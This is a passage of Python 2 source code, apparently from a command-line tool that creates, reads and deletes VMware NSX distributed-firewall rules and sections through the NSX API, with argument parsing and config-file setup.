rule_schema['rule']['name'] = str(rule_name)
# If appliedTo is 'ALL_EDGES' only inout is allowed
rule_schema['rule']['direction'] = str(rule_direction)
# If appliedTo is 'ALL_EDGES' only packetType any is allowed
rule_schema['rule']['packetType'] = str(rule_pktype)
rule_schema['rule']['@disabled'] = str(rule_disabled)
rule_schema['rule']['action'] = str(rule_action)
rule_schema['rule']['appliedToList']['appliedTo']['value'] = str(rule_applyto)
# Optional values of a rule. I believe it's cleaner to set them anyway, even if to an empty value
rule_schema['rule']['notes'] = rule_note
# If appliedTo is 'ALL_EDGES' no tags are allowed
rule_schema['rule']['tag'] = rule_tag
rule_schema['rule']['@logged'] = rule_logged
# Deleting all the three following sections will create the simplest any any any allow any rule
#
# If the source value is "any" the section needs to be deleted
if rule_source_value == 'any':
del rule_schema['rule']['sources']
# Mandatory values of a source ( NB: source is an optional value )
elif rule_source_value != '':
rule_schema['rule']['sources']['source']['value'] = rule_source_value
rule_schema['rule']['sources']['source']['type'] = API_TYPES[rule_source_type]
# Optional values of a source ( if specified )
if rule_source_excluded != '':
rule_schema['rule']['sources']['@excluded'] = rule_source_excluded
elif rule_source_name != '':
# Code to map name to value
rule_source_value = nametovalue(vccontent, client_session, rule_source_name, rule_source_type)
if rule_source_value == '':
print 'Matching Source Object ID not found - Abort - No operations have been performed on the system'
return
rule_schema['rule']['sources']['source']['value'] = rule_source_value
rule_schema['rule']['sources']['source']['type'] = API_TYPES[rule_source_type]
# Optional values of a source ( if specified )
if rule_source_excluded != '':
rule_schema['rule']['sources']['@excluded'] = rule_source_excluded
# If the destination value is "any" the section needs to be deleted
if rule_destination_value == 'any':
del rule_schema['rule']['destinations']
# Mandatory values of a destination ( NB: destination is an optional value )
elif rule_destination_value != '':
rule_schema['rule']['destinations']['destination']['value'] = rule_destination_value
#rule_schema['rule']['destinations']['destination']['type'] = rule_destination_type
rule_schema['rule']['destinations']['destination']['type'] = API_TYPES[rule_destination_type]
# Optional values of a destination ( if specified )
if rule_destination_excluded != '':
rule_schema['rule']['destinations']['@excluded'] = rule_destination_excluded
elif rule_destination_name != '':
# Code to map name to value
rule_destination_value = nametovalue(vccontent, client_session, rule_destination_name,
rule_destination_type)
if rule_destination_value == '':
print 'Matching Destination Object ID not found - No operations have been performed on the system'
return
rule_schema['rule']['destinations']['destination']['value'] = rule_destination_value
rule_schema['rule']['destinations']['destination']['type'] = API_TYPES[rule_destination_type]
# Optional values of a destination ( if specified )
if rule_destination_excluded != '':
rule_schema['rule']['destinations']['@excluded'] = rule_destination_excluded
# If no services are specified the section needs to be deleted
if rule_service_protocolname == '' and rule_service_destport == '' and rule_service_name == '':
del rule_schema['rule']['services']
elif rule_service_protocolname != '' and rule_service_destport != '' and rule_service_name != '':
print ('Service can be specified either via protocol/port or name')
return
elif rule_service_protocolname != '':
# Mandatory values of a service specified via protocol ( NB: service is an optional value )
rule_schema['rule']['services']['service']['protocolName'] = rule_service_protocolname
if rule_service_destport != '':
rule_schema['rule']['services']['service']['destinationPort'] = rule_service_destport
# Optional values of a service specified via protocol ( if specified )
if rule_service_srcport != '':
rule_schema['rule']['services']['service']['sourcePort'] = rule_service_srcport
elif rule_service_name != '':
# Mandatory values of a service specified via application/application group (service is an optional value)
rule_schema['rule']['services']['service']['value'] = ''
services = client_session.read('servicesScope', uri_parameters={'scopeId': 'globalroot-0'})
service = services.items()[1][1]['list']['application']
for servicedict in service:
if str(servicedict['name']) == rule_service_name:
rule_schema['rule']['services']['service']['value'] = str(servicedict['objectId'])
if rule_schema['rule']['services']['service']['value'] == '':
servicegroups = client_session.read('serviceGroups', uri_parameters={'scopeId': 'globalroot-0'})
servicegrouplist = servicegroups.items()[1][1]['list']['applicationGroup']
for servicegroupdict in servicegrouplist:
if str(servicegroupdict['name']) == rule_service_name:
rule_schema['rule']['services']['service']['value'] = str(servicegroupdict['objectId'])
if rule_schema['rule']['services']['service']['value'] == '':
print ('Invalid service specified')
return
try:
rule = client_session.create(rule_type, uri_parameters={'sectionId': section_id}, request_body_dict=rule_schema,
additional_headers={'If-match': section_etag})
return rule
except:
print("")
        print 'Error: cannot create rule. It is possible that some of the parameters are not compatible. Please ' \
              'check that the following rules are obeyed:'
        print '(*) If the rule is applied to all edge gateways, then "inout" is the only allowed value for parameter -dir'
        print '(*) Allowed values for -pktype parameter are any/ipv6/ipv4'
        print '(*) For L3 rules applied to all edge gateways "any" is the only allowed value for parameter -pktype'
        print '(*) For an L2 rule "any" is the only allowed value for parameter -pktype'
        print '(*) For an L3 rule allowed values for -action parameter are allow/block/reject'
        print '(*) For an L2 rule allowed values for -action parameter are allow/block'
        print("")
        print 'Aborting. No action has been performed on the system'
print("")
print("Printing current DFW rule schema used in API call")
print("-------------------------------------------------")
print rule_schema
return
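# Usage sketch: a minimal L3 rule created via positional arguments (all ids
# and names are placeholders; `vccontent` is only required when sources or
# destinations are passed by name instead of by value):
#
#   dfw_rule_create(session, 1007, 'allow-web', '10.0.0.0/24', 'any',
#                   'inout', 'ipv4', 'dfw',
#                   rule_service_protocolname='TCP',
#                   rule_service_destport='443')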
def _dfw_rule_create_print(client_session, vccontent, **kwargs):
if not (kwargs['dfw_section_id']):
print ('Mandatory parameters missing: [-sid SECTION ID]')
return None
section_id = kwargs['dfw_section_id']
if not (kwargs['dfw_rule_name']):
print ('Mandatory parameters missing: [-rname RULE NAME]')
return None
rule_name = kwargs['dfw_rule_name']
if not (kwargs['dfw_rule_applyto']):
print ('Mandatory parameters missing: [-appto RULE APPLYTO VALUE ( ex: "any","dfw","edgegw" or object-id )]')
return None
if kwargs['dfw_rule_applyto'] == 'any':
rule_applyto = 'ANY'
elif kwargs['dfw_rule_applyto'] == 'dfw':
rule_applyto = 'DISTRIBUTED_FIREWALL'
elif kwargs['dfw_rule_applyto'] == 'edgegw':
rule_applyto = 'ALL_EDGES'
else:
rule_applyto = kwargs['dfw_rule_applyto']
if not (kwargs['dfw_rule_direction']):
print ('Mandatory parameters missing: [-dir RULE DIRECTION ("inout","in","out")]')
return None
if rule_applyto != 'ALL_EDGES' \
and ((kwargs['dfw_rule_direction']) == 'inout' or (kwargs['dfw_rule_direction']) == 'in' or
(kwargs['dfw_rule_direction']) == 'out'):
rule_direction = kwargs['dfw_rule_direction']
elif rule_applyto == 'ALL_EDGES' and (kwargs['dfw_rule_direction']) == 'inout':
rule_direction = kwargs['dfw_rule_direction']
else:
print ('Allowed values for -dir parameter are inout/in/out')
print('If the rule is applied to all edge gateways, then "inout" is the only allowed value for parameter -dir')
return None
if not (kwargs['dfw_rule_pktype']):
print ('Mandatory parameters missing: [-pktype RULE PACKET TYPE ("any","ipv6","ipv4"]')
return None
if rule_applyto != 'ALL_EDGES' \
and ((kwargs['dfw_rule_pktype']) == 'any' or (kwargs['dfw_rule_pktype']) == 'ipv4' or
(kwargs['dfw_rule_pktype']) == 'ipv6'):
rule_pktype = kwargs['dfw_rule_pktype']
elif rule_applyto == 'ALL_EDGES' and (kwargs['dfw_rule_pktype']) == 'any':
rule_pktype = kwargs['dfw_rule_pktype']
else:
print ('Allowed values for -pktype parameter are any/ipv6/ipv4')
        print ('For L3 rules applied to all edge gateways "any" is the only allowed value for parameter -pktype')
        print ('For an L2 rule "any" is the only allowed value for parameter -pktype')
return None
if not (kwargs['dfw_rule_disabled']):
print ('Using default value "false" for rule "disabled" attribute')
rule_disabled = 'false'
elif (kwargs['dfw_rule_disabled']) == 'false' or (kwargs['dfw_rule_disabled']) == 'true':
rule_disabled = kwargs['dfw_rule_disabled']
else:
print ('Allowed values for -disabled parameter are true/false')
return None
if not (kwargs['dfw_rule_action']):
print ('Using default value "allow" for rule "action" attribute')
rule_action = 'allow'
elif (kwargs['dfw_rule_action']) == 'allow' or (kwargs['dfw_rule_action']) == 'block' \
or (kwargs['dfw_rule_action']) == 'reject':
rule_action = kwargs['dfw_rule_action']
else:
        print ('For an L3 rule allowed values for -action parameter are allow/block/reject')
        print ('For an L2 rule allowed values for -action parameter are allow/block')
return None
if not (kwargs['dfw_rule_source_type']):
print ('Using default value "Ipv4Address" for rule source "type" attribute')
rule_source_type = 'Ipv4Address'
else:
rule_source_type = kwargs['dfw_rule_source_type']
if not (kwargs['dfw_rule_source_value']):
rule_source_value = ''
else:
rule_source_value = kwargs['dfw_rule_source_value']
if not (kwargs['dfw_rule_source_name']):
rule_source_name = ''
else:
rule_source_name = kwargs['dfw_rule_source_name']
if rule_source_value == '' and rule_source_name == '':
print ('Either rule source parameter "value" or rule source parameter "name" must be defined')
return
if not (kwargs['dfw_rule_source_excluded']):
print ('Using default value "false" for rule source "excluded" attribute')
rule_source_excluded = 'false'
    elif (kwargs['dfw_rule_source_excluded']) != 'true' and (kwargs['dfw_rule_source_excluded']) != 'false':
print ('Allowed values for rule source excluded parameter are "true" and "false"')
return
else:
rule_source_excluded = kwargs['dfw_rule_source_excluded']
if not (kwargs['dfw_rule_destination_type']):
print ('Using default value "Ipv4Address" for rule destination "type" attribute')
rule_destination_type = 'Ipv4Address'
else:
rule_destination_type = kwargs['dfw_rule_destination_type']
if not (kwargs['dfw_rule_destination_name']):
rule_destination_name = ''
else:
rule_destination_name = kwargs['dfw_rule_destination_name']
if not (kwargs['dfw_rule_destination_value']):
rule_destination_value = ''
else:
rule_destination_value = kwargs['dfw_rule_destination_value']
if rule_destination_value == '' and rule_destination_name == '':
print ('Either rule destination parameter "value" or rule destination parameter "name" must be defined')
return
if not (kwargs['dfw_rule_destination_excluded']):
print ('Using default value "false" for rule destination "excluded" attribute')
rule_destination_excluded = 'false'
elif (kwargs['dfw_rule_destination_excluded']) != 'true' and (kwargs['dfw_rule_destination_excluded']) != 'false':
print ('Allowed values for rule destination excluded parameter are "true" and "false"')
return
else:
rule_destination_excluded = kwargs['dfw_rule_destination_excluded']
if not (kwargs['dfw_rule_service_protocolname']):
rule_service_protocolname = ''
else:
rule_service_protocolname = kwargs['dfw_rule_service_protocolname']
if not (kwargs['dfw_rule_service_destport']):
rule_service_destport = ''
else:
rule_service_destport = kwargs['dfw_rule_service_destport']
if not (kwargs['dfw_rule_service_srcport']):
rule_service_srcport = ''
else:
rule_service_srcport = kwargs['dfw_rule_service_srcport']
if not (kwargs['dfw_rule_service_name']):
rule_service_name = ''
else:
rule_service_name = kwargs['dfw_rule_service_name']
if (rule_service_protocolname == '') and (rule_service_destport != ''):
print ('Protocol name must be specified in the rule service parameter if a destination port is specified')
return
if (rule_service_protocolname != '') and (rule_service_destport != '') and (rule_service_name != ''):
print ('Rule service can be specified by either protocol/port or service name, but not both')
return
if rule_applyto != 'ALL_EDGES':
if not (kwargs['dfw_rule_tag']):
rule_tag = ''
else:
rule_tag = kwargs['dfw_rule_tag']
elif rule_applyto == 'ALL_EDGES':
# If appliedTo is 'ALL_EDGES' no tags are allowed
rule_tag = ''
else:
rule_tag = ''
if not (kwargs['dfw_rule_note']):
rule_note = ''
else:
rule_note = kwargs['dfw_rule_note']
if not (kwargs['dfw_rule_logged']):
print ('Using default value "false" for rule "logging" attribute')
rule_logged = 'false'
else:
if kwargs['dfw_rule_logged'] == 'true' or kwargs['dfw_rule_logged'] == 'false':
rule_logged = kwargs['dfw_rule_logged']
else:
print ('Allowed values for rule logging are "true" and "false"')
return
rule = dfw_rule_create(client_session, section_id, rule_name, rule_source_value, rule_destination_value,
rule_direction, rule_pktype, rule_applyto, rule_disabled, rule_action, rule_source_type,
rule_destination_type, rule_source_excluded,rule_destination_excluded, rule_logged,
rule_source_name, rule_destination_name, rule_service_protocolname, rule_service_destport,
rule_service_srcport, rule_service_name, rule_note, rule_tag, vccontent)
if kwargs['verbose']:
print rule
else:
l2_rule_list, l3_rule_list, l3r_rule_list = dfw_rule_list(client_session)
print ''
print '*** ETHERNET RULES ***'
print tabulate(l2_rule_list, headers=["ID", "Name", "Source", "Destination", "Service", "Action", "Direction",
"Packet Type", "Applied-To", "ID (Section)"], tablefmt="psql")
print ''
print '*** LAYER 3 RULES ***'
print tabulate(l3_rule_list, headers=["ID", "Name", "Source", "Destination", "Service", "Action", "Direction",
"Packet Type", "Applied-To", "ID (Section)"], tablefmt="psql")
def dfw_rule_service_delete(client_session, rule_id, service):
"""
    This function deletes one of the services of a dfw rule given the rule id and the service to be deleted.
If two or more services have the same name, the function will delete all of them
:param client_session: An instance of an NsxClient Session
:param rule_id: The ID of the dfw rule to retrieve
:param service: The service of the dfw rule to be deleted. If the service name contains any space, then
it must be enclosed in double quotes (like "VM Network"). For TCP/UDP services the syntax is as
follows: Proto:SourcePort:DestinationPort ( example TCP:9090:any )
:return: returns
- tabular view of the dfw rule after the deletion process has been performed
        - ( verbose option ) a list containing a list with the following dfw rule information after the deletion
          process has been performed: ID(Rule)- Name(Rule)- Source- Destination- Services- Action- Direction-
          Pkttype- AppliedTo- ID(section)
"""
    service = str(service).split(':', 2)
if len(service) == 1:
service.append('')
if len(service) == 2:
service.append('')
rule = dfw_rule_read(client_session, rule_id)
if len(rule) == 0:
# It means a rule with id = rule_id does not exist
result = [[rule_id, "---", "---", "---", service, "---", "---", "---", "---", "---"]]
return result
# Get the rule data structure that will be modified and then piped into the update function
section_list = dfw_section_list(client_session)
sections = [section_list[0], section_list[1], section_list[2]]
section_id = rule[0][-1]
rule_type_selector = ''
for scan in sections:
for val in scan:
if val[1] == section_id:
rule_type_selector = val[2]
if rule_type_selector == '':
print 'ERROR: RULE TYPE SELECTOR CANNOT BE EMPTY - ABORT !'
return
if rule_type_selector == 'LAYER2':
rule_type = 'dfwL2Rule'
elif rule_type_selector == 'LAYER3':
rule_type = 'dfwL3Rule'
else:
rule_type = 'rule'
rule_schema = client_session.read(rule_type, uri_parameters={'ruleId': rule_id, 'sectionId': section_id})
rule_etag = rule_schema.items()[-1][1]
if 'services' not in rule_schema.items()[1][1]['rule']:
# It means the only service is "any" and it cannot be deleted short of deleting the whole rule
rule = dfw_rule_read(client_session, rule_id)
return rule
if type(rule_schema.items()[1][1]['rule']['services']['service']) == list:
        # It means there is more than one service, each one with its own dict
service_list = rule_schema.items()[1][1]['rule']['services']['service']
for i, val in enumerate(service_list):
if ('name' in val and val['name'] == service[0]) or ('sourcePort' not in val and service[1] == 'any'
and 'destinationPort' not in val and service[2] == 'any' and 'protocolName' in val and
val['protocolName'] == service[0]) or ('sourcePort' in val and val['sourcePort'] == service[1]
and 'destinationPort' not in val and service[2] == 'any' and 'protocolName' in val
and val['protocolName'] == service[0]) or ('sourcePort' in val and val['sourcePort'] == service[1]
and 'destinationPort' in val and val['destinationPort'] == service[2] and 'protocolName' in val
and val['protocolName'] == service[0]) or ('sourcePort' not in val and service[1] == 'any'
and 'destinationPort' in val and val['destinationPort'] == service[2] and 'protocolName' in val and
val['protocolName'] == service[0]):
del rule_schema.items()[1][1]['rule']['services']['service'][i]
        # The ordered dict "rule_schema" must be parsed to find the dict that will be piped into the update function
rule = client_session.update(rule_type, uri_parameters={'ruleId': rule_id, 'sectionId': section_id},
request_body_dict=rule_schema.items()[1][1],
additional_headers={'If-match': rule_etag})
rule = dfw_rule_read(client_session, rule_id)
return rule
if type(rule_schema.items()[1][1]['rule']['services']['service']) == dict:
        # It means there is just one explicit service with its own dict
service_dict = rule_schema.items()[1][1]['rule']['services']['service']
val = service_dict
if ('name' in val and val['name'] == service[0]) or ('sourcePort' not in val and service[1] == 'any'
and 'destinationPort' not in val and service[2] == 'any' and 'protocolName' in val and
val['protocolName'] == service[0]) or ('sourcePort' in val and val['sourcePort'] == service[1]
and 'destinationPort' not in val and service[2] == 'any' and 'protocolName' in val
and val['protocolName'] == service[0]) or ('sourcePort' in val and val['sourcePort'] == service[1]
and 'destinationPort' in val and val['destinationPort'] == service[2] and 'protocolName' in val
and val['protocolName'] == service[0]) or ('sourcePort' not in val and service[1] == 'any'
and 'destinationPort' in val and val['destinationPort'] == service[2] and 'protocolName' in val and
val['protocolName'] == service[0]):
del rule_schema.items()[1][1]['rule']['services']
rule = client_session.update(rule_type, uri_parameters={'ruleId': rule_id, 'sectionId': section_id},
request_body_dict=rule_schema.items()[1][1],
additional_headers={'If-match': rule_etag})
rule = dfw_rule_read(client_session, rule_id)
return rule
def _dfw_rule_service_delete_print(client_session, **kwargs):
if not (kwargs['dfw_rule_id']):
print ('Mandatory parameters missing: [-rid RULE ID]')
return None
if not (kwargs['dfw_rule_service']):
print ('Mandatory parameters missing: [-srv RULE SERVICE]')
return None
rule_id = kwargs['dfw_rule_id']
service = kwargs['dfw_rule_service']
rule = dfw_rule_service_delete(client_session, rule_id, service)
if kwargs['verbose']:
        print(rule)
    else:
        print(tabulate(rule, headers=["ID", "Name", "Source", "Destination", "Service", "Action", "Direction",
                                      "Packet Type", "Applied-To", "ID (Section)"], tablefmt="psql"))
def dfw_rule_applyto_delete(client_session, rule_id, applyto):
"""
    This function deletes one of the applyto clauses of a dfw rule given the rule id and the clause to be deleted.
    If two or more clauses have the same name, the function will delete all of them
    :param client_session: An instance of an NsxClient Session
    :param rule_id: The ID of the dfw rule to modify
:param applyto: The name of the applyto clause of the dfw rule to be deleted. If it contains any space, then
it must be enclosed in double quotes (like "VM Network").
:return: returns
- tabular view of the dfw rule after the deletion process has been performed
- ( verbose option ) a list containing a list with the following dfw rule information after the deletion
process has been performed: ID(Rule)- Name(Rule)- Source- Destination- Services- Action - Direction-
              Pkttype- AppliedTo- ID(section)
"""
apply_to = str(applyto)
rule = dfw_rule_read(client_session, rule_id)
if len(rule) == 0:
# It means a rule with id = rule_id does not exist
result = [[rule_id, "---", "---", "---", "---", "---", "---", "---", apply_to, "---"]]
return result
# Get the rule data structure that will be modified and then piped into the update function
section_list = dfw_section_list(client_session)
sections = [section_list[0], section_list[1], section_list[2]]
section_id = rule[0][-1]
rule_type_selector = ''
for scan in sections:
for val in scan:
if val[1] == section_id:
rule_type_selector = val[2]
if rule_type_selector == '':
        print('ERROR: RULE TYPE SELECTOR CANNOT BE EMPTY - ABORT !')
return
if rule_type_selector == 'LAYER2':
rule_type = 'dfwL2Rule'
elif rule_type_selector == 'LAYER3':
rule_type = 'dfwL3Rule'
else:
rule_type = 'rule'
rule_schema = client_session.read(rule_type, uri_parameters={'ruleId': rule_id, 'sectionId': section_id})
rule_etag = rule_schema.items()[-1][1]
    if type(rule_schema.items()[1][1]['rule']['appliedToList']['appliedTo']) == list:
        # It means there is more than one applyto clause, each with its own dict
        applyto_list = rule_schema.items()[1][1]['rule']['appliedToList']['appliedTo']
        # Iterate in reverse so that deleting an entry does not skip the next one
        for i in reversed(range(len(applyto_list))):
            if 'name' in applyto_list[i] and applyto_list[i]['name'] == apply_to:
                del applyto_list[i]
        # The ordered dict "rule_schema" must be parsed to find the dict that will be piped into the update function
rule = client_session.update(rule_type, uri_parameters={'ruleId': rule_id, 'sectionId': section_id},
request_body_dict=rule_schema.items()[1][1],
additional_headers={'If-match': rule_etag})
rule = dfw_rule_read(client_session, rule_id)
return rule
if type(rule_schema.items()[1][1]['rule']['appliedToList']['appliedTo']) == dict:
        # It means there is just one explicit applyto clause with its dict
applyto_dict = rule_schema.items()[1][1]['rule']['appliedToList']['appliedTo']
val = applyto_dict
if 'name' in val and val['name'] == "DISTRIBUTED_FIREWALL":
# It means the only applyto clause is "DISTRIBUTED_FIREWALL" and it cannot be deleted short of deleting
# the whole rule
rule = dfw_rule_read(client_session, rule_id)
return rule
if 'name' in val and val['name'] == apply_to:
del rule_schema.items()[1][1]['rule']['appliedToList']
rule = client_session.update(rule_type, uri_parameters={'ruleId': rule_id, 'sectionId': section_id},
request_body_dict=rule_schema.items()[1][1],
additional_headers={'If-match': rule_etag})
rule = dfw_rule_read(client_session, rule_id)
return rule
def _dfw_rule_applyto_delete_print(client_session, **kwargs):
if not (kwargs['dfw_rule_id']):
print ('Mandatory parameters missing: [-rid RULE ID]')
return None
if not (kwargs['dfw_rule_applyto']):
print ('Mandatory parameters missing: [-appto RULE APPLYTO]')
return None
rule_id = kwargs['dfw_rule_id']
applyto = kwargs['dfw_rule_applyto']
rule = dfw_rule_applyto_delete(client_session, rule_id, applyto)
if kwargs['verbose']:
        print(rule)
    else:
        print(tabulate(rule, headers=["ID", "Name", "Source", "Destination", "Service", "Action", "Direction",
                                      "Packet Type", "Applied-To", "ID (Section)"], tablefmt="psql"))
def dfw_section_read(client_session, dfw_section_id):
"""
This function retrieves details of a dfw section given its id
:param client_session: An instance of an NsxClient Session
:param dfw_section_id: The ID of the dfw section to retrieve details from
:return: returns
- a tabular view of the section with the following information: Name, Section id, Section type, Etag
            - ( verbose option ) a dictionary containing all the section's details
"""
section_list = []
dfw_section_id = str(dfw_section_id)
uri_parameters = {'sectionId': dfw_section_id}
dfwL3_section_details = dict(client_session.read('dfwL3SectionId', uri_parameters))
section_name = dfwL3_section_details['body']['section']['@name']
section_id = dfwL3_section_details['body']['section']['@id']
section_type = dfwL3_section_details['body']['section']['@type']
section_etag = dfwL3_section_details['Etag']
section_list.append((section_name, section_id, section_type, section_etag))
return section_list, dfwL3_section_details
def _dfw_section_read_print(client_session, **kwargs):
if not (kwargs['dfw_section_id']):
print ('Mandatory parameters missing: [-sid SECTION ID]')
return None
dfw_section_id = kwargs['dfw_section_id']
section_list, dfwL3_section_details = dfw_section_read(client_session, dfw_section_id)
if kwargs['verbose']:
        print(dfwL3_section_details['body'])
    else:
        print(tabulate(section_list, headers=["Name", "ID", "Type", "Etag"], tablefmt="psql"))
def dfw_section_create(client_session, dfw_section_name, dfw_section_type):
"""
    This function creates a new dfw section given its name and its type
    The new section is created on top of all other existing sections and with no rules
    If a section of the same type and with the same name already exists, nothing is done
:param client_session: An instance of an NsxClient Session
:param dfw_section_name: The name of the dfw section to be created
:param dfw_section_type: The type of the section. Allowed values are L2/L3/L3R
:return: returns
- a tabular view of all the sections of the same type of the one just created. The table contains the
following information: Name, Section id, Section type
- ( verbose option ) a dictionary containing for each possible type all sections' details, including
dfw rules
"""
dfw_section_name = str(dfw_section_name)
dfw_section_selector = str(dfw_section_type)
if dfw_section_selector != 'L2' and dfw_section_selector != 'L3' and dfw_section_selector != 'L3R':
print ('Section Type Unknown - Allowed values are L2/L3/L3R -- Aborting')
return
if dfw_section_selector == 'L2':
dfw_section_type = 'dfwL2Section'
elif dfw_section_selector == 'L3':
dfw_section_type = 'dfwL3Section'
else:
dfw_section_type = 'layer3RedirectSections'
# Regardless of the final rule type this line below is the correct way to get the empty schema
section_schema = client_session.extract_resource_body_example('dfwL3Section', 'create')
section_schema['section']['@name'] = dfw_section_name
# Delete the rule section to create an empty section
del section_schema['section']['rule']
# Check for duplicate sections of the same type as the one that will be created, create and return
l2_section_list, l3r_section_list, l3_section_list, detailed_dfw_sections = dfw_section_list(client_session)
if dfw_section_type == 'dfwL2Section':
for val in l2_section_list:
if dfw_section_name in val:
                # A section with the same name already exists
return l2_section_list, detailed_dfw_sections
section = client_session.create(dfw_section_type, request_body_dict=section_schema)
l2_section_list, l3r_section_list, l3_section_list, detailed_dfw_sections = dfw_section_list(client_session)
return l2_section_list, detailed_dfw_sections
if dfw_section_type == 'dfwL3Section':
for val in l3_section_list:
if dfw_section_name in val:
                # A section with the same name already exists
return l3_section_list, detailed_dfw_sections
section = client_session.create(dfw_section_type, request_body_dict=section_schema)
l2_section_list, l3r_section_list, l3_section_list, detailed_dfw_sections = dfw_section_list(client_session)
return l3_section_list, detailed_dfw_sections
if dfw_section_type == 'layer3RedirectSections':
for val in l3r_section_list:
if dfw_section_name in val:
                # A section with the same name already exists
return l3r_section_list, detailed_dfw_sections
section = client_session.create(dfw_section_type, request_body_dict=section_schema)
l2_section_list, l3r_section_list, l3_section_list, detailed_dfw_sections = dfw_section_list(client_session)
return l3r_section_list, detailed_dfw_sections
def _dfw_section_create_print(client_session, **kwargs):
if not (kwargs['dfw_section_name']):
print ('Mandatory parameters missing: [-sname SECTION NAME]')
return None
if not (kwargs['dfw_section_type']):
print ('Mandatory parameters missing: [-stype SECTION TYPE] - Allowed values are L2/L3/L3R -- Aborting')
return None
if kwargs['dfw_section_type'] != 'L3' and kwargs['dfw_section_type'] != 'L2' and kwargs['dfw_section_type'] != 'L3R':
print ('Incorrect parameter: [-stype SECTION TYPE] - Allowed values are L2/L3/L3R -- Aborting')
return None
dfw_section_name = kwargs['dfw_section_name']
dfw_section_type = kwargs['dfw_section_type']
section_list, detailed_dfw_sections = dfw_section_create(client_session, dfw_section_name, dfw_section_type)
if kwargs['verbose']:
        print(detailed_dfw_sections)
    else:
        print(tabulate(section_list, headers=["Name", "ID", "Type"], tablefmt="psql"))
def contruct_parser(subparsers):
parser = subparsers.add_parser('dfw', description="Functions for distributed firewall",
help="Functions for distributed firewall",
formatter_class=RawTextHelpFormatter)
parser.add_argument("command", help="""
list_sections: return a list of all distributed firewall's sections
read_section: return the details of a dfw section given its id
read_section_id: return the id of a section given its name (case sensitive)
create_section: create a new section given its name and its type (L2,L3,L3R)
delete_section: delete a section given its id
list_rules: return a list of all distributed firewall's rules
read_rule: return the details of a dfw rule given its id
read_rule_id: return the id of a rule given its name and the id of the section to which it belongs
create_rule: create a new rule given the id of the section, the rule name and all the rule parameters
delete_rule: delete a rule given its id
delete_rule_source: delete one rule's source given the rule id and the source identifier
delete_rule_destination: delete one rule's destination given the rule id and the destination identifier
delete_rule_service: delete one rule's service given the rule id and the service identifier
delete_rule_applyto: delete one rule's applyto clause given the rule id and the applyto clause identifier
move_rule_above: move one rule above another rule given the id of the rule to be moved and the id of the base rule
""")
parser.add_argument("-sid",
"--dfw_section_id",
help="dfw section id needed for create, read and delete operations")
parser.add_argument("-rid",
"--dfw_rule_id",
help="dfw rule id needed for create, read and delete operations")
parser.add_argument("-sname",
"--dfw_section_name",
help="dfw section name")
parser.add_argument("-rname",
"--dfw_rule_name",
help="dfw rule name")
parser.add_argument("-dir",
"--dfw_rule_direction",
help="dfw rule direction")
parser.add_argument("-pktype",
"--dfw_rule_pktype",
help="dfw rule packet type")
parser.add_argument("-disabled",
"--dfw_rule_disabled",
help="dfw rule disabled")
parser.add_argument("-action",
"--dfw_rule_action",
help="dfw rule action")
parser.add_argument("-src",
"--dfw_rule_source",
help="dfw rule source")
parser.add_argument("-srctype",
"--dfw_rule_source_type",
help="dfw rule source type")
parser.add_argument("-srcname",
"--dfw_rule_source_name",
help="dfw rule source name")
parser.add_argument("-srcvalue",
"--dfw_rule_source_value",
help="dfw rule source value")
parser.add_argument("-srcexcluded",
"--dfw_rule_source_excluded",
help="dfw rule source excluded")
parser.add_argument("-dst",
"--dfw_rule_destination",
help="dfw rule destination")
parser.add_argument("-dsttype",
"--dfw_rule_destination_type",
help="dfw rule destination type")
parser.add_argument("-dstname",
"--dfw_rule_destination_name",
help="dfw rule destination name")
parser.add_argument("-dstvalue",
"--dfw_rule_destination_value",
help="dfw rule destination value")
parser.add_argument("-dstexcluded",
"--dfw_rule_destination_excluded",
help="dfw rule destination excluded")
parser.add_argument("-srv",
"--dfw_rule_service",
help="dfw rule service")
parser.add_argument("-srvprotoname",
"--dfw_rule_service_protocolname",
help="dfw rule service protocol name")
parser.add_argument("-srvdestport",
"--dfw_rule_service_destport",
help="dfw rule service destination port")
parser.add_argument("-srvsrcport",
"--dfw_rule_service_srcport",
help="dfw rule service source port")
parser.add_argument("-srvname",
"--dfw_rule_service_name",
help="dfw rule service name")
parser.add_argument("-appto",
"--dfw_rule_applyto",
help="dfw rule applyto")
parser.add_argument("-note",
"--dfw_rule_note",
help="dfw rule note")
parser.add_argument("-tag",
"--dfw_rule_tag",
help="dfw rule tag")
parser.add_argument("-logged",
"--dfw_rule_logged",
help="dfw rule logged")
parser.add_argument("-brid",
"--dfw_rule_base_id",
help="dfw rule base id")
parser.add_argument("-stype",
"--dfw_section_type",
help="dfw section type")
parser.set_defaults(func=_dfw_main)
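# Example invocation, assuming this module is wired into a CLI wrapper that passes
# an ini file via -i (the wrapper name and ini path are illustrative only):
#   <cli> -i nsx.ini dfw read_rule -rid 1013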
def _dfw_main(args):
if args.debug:
debug = True
else:
debug = False
config = ConfigParser.ConfigParser()
assert config.read(args.ini), 'could not read config file {}'.format(args.ini)
try:
nsxramlfile = config.get('nsxraml', 'nsxraml_file')
except (ConfigParser.NoSectionError):
nsxramlfile_dir = resource_filename(__name__, 'api_spec')
nsxramlfile = '{}/nsxvapi.raml'.format(nsxramlfile_dir)
client_session = NsxClient(nsxramlfile, config.get('nsxv', 'nsx_manager'),
config.get('nsxv', 'nsx_username'), config.get('nsxv', 'nsx_password'), debug=debug)
vccontent = connect_to_vc(config.get('vcenter', 'vcenter'), config.get('vcenter', 'vcenter_user'),
config.get('vcenter', 'vcenter_passwd'))
try:
command_selector = {
'list_sections': _dfw_section_list_print,
'read_section': _dfw_section_read_print,
'list_rules': _dfw_rule_list_print,
'read_rule': _dfw_rule_read_print,
'read_section_id': _dfw_section_id_read_print,
'read_rule_id': _dfw_rule_id_read_print,
'delete_section': _dfw_section_delete_print,
'delete_rule': _dfw_rule_delete_print,
'delete_rule_source': _dfw_rule_source_delete_print,
'delete_rule_destination': _dfw_rule_destination_delete_print,
'delete_rule_service': _dfw_rule_service_delete_print,
'delete_rule_applyto': _dfw_rule_applyto_delete_print,
'create_section': _dfw_section_create_print,
'create_rule': _dfw_rule_create_print,
}
command_selector[args.command](client_session, vccontent=vccontent, verbose=args.verbose,
dfw_section_id=args.dfw_section_id,
dfw_rule_id=args.dfw_rule_id, dfw_section_name=args.dfw_section_name,
dfw_rule_name=args.dfw_rule_name, dfw_rule_source=args.dfw_rule_source,
dfw_rule_destination=args.dfw_rule_destination,
dfw_rule_service=args.dfw_rule_service, dfw_rule_applyto=args.dfw_rule_applyto,
dfw_rule_base_id=args.dfw_rule_base_id, dfw_section_type=args.dfw_section_type,
